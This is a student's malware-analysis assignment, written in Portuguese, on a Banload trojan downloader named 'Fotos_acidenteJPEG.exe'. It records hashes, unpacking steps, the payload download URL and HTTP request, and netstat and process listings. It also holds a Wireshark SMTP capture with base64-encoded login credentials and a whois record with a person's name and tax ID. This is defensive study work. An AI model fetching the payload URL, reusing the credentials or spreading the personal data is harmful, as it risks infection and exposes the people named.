Fernando Bracalente Seg15 O trabalho final consiste em escolher um dos "malwares-novos" e responder algumas questões. Questões: 1. Qual o nome do arquivo? Fotos_acidenteJPEG.exe 2. Qual o md5 do arquivo escolhido? 286b95fe9e651f45f6181c29968f430d 3. Qual a razão do nome utilizado pelo arquivo? Para persuadir o usuário a clicar no arquivo 4. O arquivo está compactado? Sim Se sim, com qual compactador?.aspack 5. Sem executar o binário, é possível descrever qual sua funcionalidade, o que ele vai fazer? Sim, utilizei o PEiD descompactando o arquivo executável com o puglin (PEiD Generic Unpacker), apos gerar o arquivo Fotos_acidenteJPEG.exe.unpacked_.exe gerei o hash do arquivo 7748a2f088774a0126552dd806877537, utilizei o comando strings.exe c:\jacomo\fotos_acidentejpeg.exe.unpacked_.exe grep http e verifiquei que existe uma url http://www.assembleiadedeusmorumbi.com.br/fotos/13/sb.exe, este malware é um downloader, baixei o arquivo sb.exe manualmente e gerei o hash 62d3f55699c236af45afec937a4bfff8, este arquivo tem 4.291KB Analisando o arquivo SB.exe, utilizei o Wireshark e executei o sb.exe em um ambiente controlado, este arquivo envia um e-mail avisando que o micro esta infectado para 2 destinatários, manesde2009@gmail.com e barata.gold@gmail.com Segue o conteúdo encontrado pelo Wireshark 220 dargo.hst.terra.com.br ESMTP EHLO MALWARE 250-dargo.hst.terra.com.br 250-PIPELINING 250-SIZE 26214400 250-AUTH LOGIN PLAIN TRRPROXY_V1 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
RSET 250 2.0.0 Ok AUTH LOGIN 334 VXNlcm5hbWU6 c210cc5yb3hadgvycmeuy29tlmjy 334 UGFzc3dvcmQ6 ZmFiaW83NDE= 235 2.7.0 Authentication successful MAIL FROM:<smtp.rox@terra.com.br> 250 2.1.0 Ok RCPT TO:<manesde2009@gmail.com> 250 2.1.5 Ok RCPT TO:<barata.gold@gmail.com> 250 2.1.5 Ok RCPT TO:<barata.gold@gmail.com> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> From: "Infect" <smtp.rox@terra.com.br> Subject: MALWARE To: manesde2009@gmail.com Date: Sat, 4 Apr 2009 17:49:08-0300 X-Priority: 3 X-Library: Indy 9.00.10 Aguardando Resposta.... 250 2.0.0 Ok: queued as 2047748000091 QUIT 221 2.0.0 Bye Jacomo depois de instalar o malware eu rodei o netstat nao e a única relação no final que notei foi que o processo referente ao malware foi uma porta 1062 criada no localhost. C:\_>netstat -nao Proto Local Address Foreign Address State PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 956 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 880 TCP 127.0.0.1:1029 0.0.0.0:0 LISTENING 1100 TCP 192.168.137.130:139 0.0.0.0:0 LISTENING 4 UDP 0.0.0.0:445 *:* 4 UDP 0.0.0.0:500 *:* 728 UDP 0.0.0.0:1025 *:* 1104 UDP 0.0.0.0:1042 *:* 1744
UDP 0.0.0.0:4500 *:* 728 UDP 127.0.0.1:123 *:* 1048 UDP 127.0.0.1:1060 *:* 1684 UDP 127.0.0.1:1062 *:* 148 UDP 127.0.0.1:1900 *:* 1184 UDP 192.168.137.130:123 *:* 1048 UDP 192.168.137.130:137 *:* 4 UDP 192.168.137.130:138 *:* 4 UDP 192.168.137.130:1900 *:* 1184 C:\_>pslist.exe PsList 1.26 - Process Information Lister Copyright (C) 1999-2004 Mark Russinovich Sysinternals - www.sysinternals.com Process information for MALWARE: Name Pid Pri Thd Hnd Priv CPU Time Elapsed Time Idle 0 0 1 0 0 0:23:29.937 0:00:00.000 System 4 8 54 362 0 0:00:11.062 0:00:00.000 smss 508 11 3 21 168 0:00:00.156 0:25:59.640 csrss 648 13 11 380 1736 0:00:13.609 0:25:59.015 winlogon 672 13 14 232 3324 0:00:01.359 0:25:58.750 services 716 9 16 342 3496 0:00:02.578 0:25:58.203 lsass 728 9 18 330 3504 0:00:01.312 0:25:58.062 svchost 880 8 21 210 2624 0:00:00.218 0:25:57.359 svchost 956 8 11 234 1628 0:00:00.156 0:25:57.046 svchost 1048 8 71 1416 12740 0:00:02.593 0:25:56.953 svchost 1104 8 6 75 1152 0:00:00.093 0:25:56.859 svchost 1184 8 15 213 1756 0:00:00.156 0:25:56.250 explorer 1432 8 10 422 15036 0:00:15.015 0:25:55.234 spoolsv 1572 8 11 118 3412 0:00:00.109 0:25:54.468 VMwareUser 1696 8 2 36 1108 0:00:01.015 0:25:53.296 SbieSvc 1896 8 7 70 1792 0:00:00.046 0:25:35.953 userdump 192 13 4 41 1556 0:00:00.031 0:25:28.234 VMwareService 280 13 3 55 924 0:00:00.796 0:25:28.109 alg 1100 8 5 103 1044 0:00:00.031 0:25:22.125 wireshark 1744 8 3 174 62972 0:00:51.359 0:23:38.859 cmd 1392 8 1 31 1932 0:00:00.156 0:20:27.906 taskmgr 1380 13 3 63 1180 0:00:01.156 0:18:44.265 Winup 1368 8 1 112 40904 0:00:23.375 0:17:33.875 mmc 536 8 6 223 5444 0:00:01.078 0:06:35.000 Fotos_acidenteJPEG 1684 8 4 125 1800 0:00:00.171 0:03:43.437 dumpcap 1892 8 1 54 1996 0:00:00.062 0:03:24.437 Fotos_acidenteJPEG 148 8 4 125 1800 0:00:00.250 0:02:57.703
pslist 1964 13 2 71 676 0:00:00.046 0:00:00.062 As informações do registro.br sobre o domínio que esta hospedando o arquivo sb.exe whois domínio: assembleiadedeusmorumbi.com.br entidade: Edimilson Francisco de Oliveira documento: 588.255.926-04 país: BR ID entidade: EDFOL12 ID admin: EDFOL12 ID técnico: EDFOL12 ID cobrança: EDFOL12 servidor DNS: ns1.t5.com.br status DNS: 04/04/2009 AA último AA: 04/04/2009 servidor DNS: ns2.t5.com.br status DNS: 04/04/2009 NOT SYNC ZONE último AA: 04/04/2009 criado: 24/07/2008 #4709932 expiração: 24/07/2009 alterado: 04/08/2008 status: publicado ID: EDFOL12 nome: Edimilson Francisco de Oliveira e-mail: alan@fastlinkjf.com.br criado: 24/07/2008 alterado: 24/07/2008 IP do domínio --> 201.33.17.140 6. Utilizando qualquer método, ao executar o binário em um ambiente *controlado*, quais alterações no sistema esse arquivo gera? Executei o malware e analise os pacotes com o Wireshark, o malware iniciou o download do arquivo sb.exe
GET /fotos/13/sb.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.assembleiadedeusmorumbi.com.br Connection: Keep-Alive HTTP/1.1 200 OK Date: Sun, 05 Apr 2009 12:05:29 GMT Server: Apache Last-Modified: Sun, 05 Apr 2009 09:01:45 GMT ETag: "a5321f1-384600-466cb07f91040" Accept-Ranges: bytes Content-Length: 3687936 Keep-Alive: timeout=8, max=80 Connection: Keep-Alive Content-Type: application/x-msdos-programconnection: Keep-Alive qual o nome do processo? Fotos_acidenteJPEG PID 1684 / 148 o arquivo muda de nome ao ser executado? Não cria um novo arquivo? sim baixa alguma coisa? sim, sb.exe 7. Agora com essas informações para que serve o binário? Server para executar o malware. 8. Qual o resultado do virustotal.com? 8/32 (faça um print-screen e envie).
Os antivírus que encontraram foram: Antiy-AVL 2.0.3.1 2009.04.05 Trojan/Win32.Banload Authentium 5.1.2.4 2009.04.05 W32/Banload.A.gen!Eldorado Avast 4.8.1335.0 2009.04.05 Win32:Trojan-gen {Other} CAT-QuickHeal 10.00 2009.04.04 TrojanDownloader.Banload.acmm DrWeb 4.44.0.09170 2009.04.05 Trojan.DownLoader.origin esafe 7.0.17.0 2009.04.05 Suspicious File F-Prot 4.4.4.56 2009.04.05 W32/Banload.A.gen!Eldorado GData 19 2009.04.05 Win32:Trojan-gen {Other} Kaspersky 7.0.0.125 2009.04.05 Trojan-Downloader.Win32.Banload.actw NOD32 3988 2009.04.04 a variant of Win32/TrojanDownloader.Banload.CHQ Panda 10.0.0.14 2009.04.05 Trj/Banbra.GGM Sophos 4.40.0 2009.04.05 Mal/Behav-130 TrendMicro 8.700.0.1004 2009.04.03 Mal_Banld-1 VBA32 3.12.10.2 2009.04.05 Trojan-Downloader.Win32.Banload.zwf Hash MD5 do site virus total bate com o hash que gerei.
Questão bônus: É possível descompactar o binário? Qual o procedimento? Resp. pergunta 5 Enviar trabalho por e-mail para jacomo.ibta@gmail.com